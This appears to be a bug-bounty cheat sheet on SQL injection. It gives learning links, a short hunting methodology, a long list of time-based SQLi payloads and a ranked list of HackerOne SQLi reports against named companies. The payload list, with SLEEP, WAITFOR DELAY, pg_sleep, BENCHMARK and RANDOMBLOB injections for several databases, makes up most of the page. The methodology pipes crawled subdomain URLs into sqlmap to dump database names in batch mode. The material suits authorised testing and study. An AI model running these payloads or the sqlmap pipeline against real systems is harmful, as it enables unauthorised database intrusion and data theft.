SQL Injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

How to start

1. Study SQL

2. http://www.amazon.com/SQL-Injection-Attacks-Defense-Second/dp/1597499633/

3. https://portswigger.net/web-security/all-labs

4. https://www.youtube.com/watch?v=du-jkS6-sbo&list=PLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro

5. https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

6. https://github.com/Audi-1/sqli-labs

7. https://rails-sqli.org/

8. https://www.youtube.com/watch?v=VIkVqvo97Hk

9. https://www.youtube.com/watch?v=SEuyruffJTw

A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) | A Guide to Manually Hunting SQL Injection

Methodology

• Burp Suite via Active Scan and Agartha extension

• Collect all Subdomain -> Crawl -> gf sqli urls >> sqli -> sqlmap -m sqli --dbs --batch

• Dork for extensions like .php or paths that most like to be vulnerable to SQLI -> Arjun -> sqlmap

Time Based SQLi Payloads

sleep(5)#
14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515
'XOR(if(now()=sysdate(),sleep(33),0))OR'
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

Top SQLI reports from HackerOne:

1. SQL Injection Extracts Starbucks Enterprise Accounting, Financial, Payroll Database to Starbucks - 743 upvotes, $0

2. SQL injection in https://labs.data.gov/dashboard/datagov/csv_to_json via User-agent to GSA Bounty - 671 upvotes, $0

3. Time-Based SQL injection at city-mobil.ru to Mail.ru - 625 upvotes, $15000

4. SQL injection at https://sea-web.gold.razer.com/ajax-get-status.php via txid parameter to Razer - 580 upvotes, $2000

5. SQL Injection in https://api-my.pay.razer.com/inviteFriend/getInviteHistoryLog to Razer - 528 upvotes, $2000

6. SQL injection on contactws.contact-sys.com in TScenObject action ScenObjects leads to remote code execution to QIWI - 469 upvotes, $0

7. Blind SQL Injection to InnoGames - 432 upvotes, $2000

8. SQL injection at fleet.city-mobil.ru to Mail.ru - 370 upvotes, $10000

9. SQL Injection in report_xml.php through countryFilter[] parameter to Valve - 348 upvotes, $25000

10. [windows10.hi-tech.mail.ru] Blind SQL Injection to Mail.ru - 329 upvotes, $5000

11. SQL Injection on cookie parameter to MTN Group - 303 upvotes, $0

12. [www.zomato.com] SQLi - /php/██████████ - item_id to Zomato - 289 upvotes, $4500

13. SQL Injection at https://sea-web.gold.razer.com/lab/cash-card-incomplete-translog-resend via period-hour Parameter to Razer - 240 upvotes, $2000

14. [api.easy2pay.co] SQL Injection at fortumo via TransID parameter [Bypassing Signature Validation🔥] to Razer - 232 upvotes, $4000

15. Boolean-based SQL Injection on relap.io to Mail.ru - 227 upvotes, $0

16. Blind SQL Injection in city-mobil.ru domain to Mail.ru - 224 upvotes, $2000

17. SQL Injection in agent-manager to Acronis - 223 upvotes, $0

18. Blind SQLi leading to RCE, from Unauthenticated access to a test API Webservice to Starbucks - 218 upvotes, $0

19. SQL Injection in www.hyperpure.com to Zomato - 211 upvotes, $2000

20. Blind SQL injection and making any profile comments from any users to disappear using "like" function (2 in 1 issues) to Pornhub - 210 upvotes, $0

21. Blind SQL Injection on starbucks.com.gt and WAF Bypass :* to Starbucks - 202 upvotes, $0

22. Remote Code Execution on contactws.contact-sys.com via SQL injection in TCertObject operation "Delete" to QIWI - 194 upvotes, $0

23. SQLi at https://sea-web.gold.razer.com/demo-th/purchase-result.php via orderid Parameter to Razer - 183 upvotes, $2000

24. Blind SQL injection in Hall of Fap to Pornhub - 179 upvotes, $0

25. www.drivegrab.com SQL injection to Grab - 175 upvotes, $4500

26. Sql injection on docs.atavist.com to Automattic - 158 upvotes, $0

27. SQL Injection [unauthenticated] with direct output at https://news.mail.ru/ to Mail.ru - 155 upvotes, $7500

28. bypass sql injection #1109311 to Acronis - 150 upvotes, $0

29. SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter to HackerOne - 147 upvotes, $0

30. SQL Injection Union Based to Automattic - 123 upvotes, $0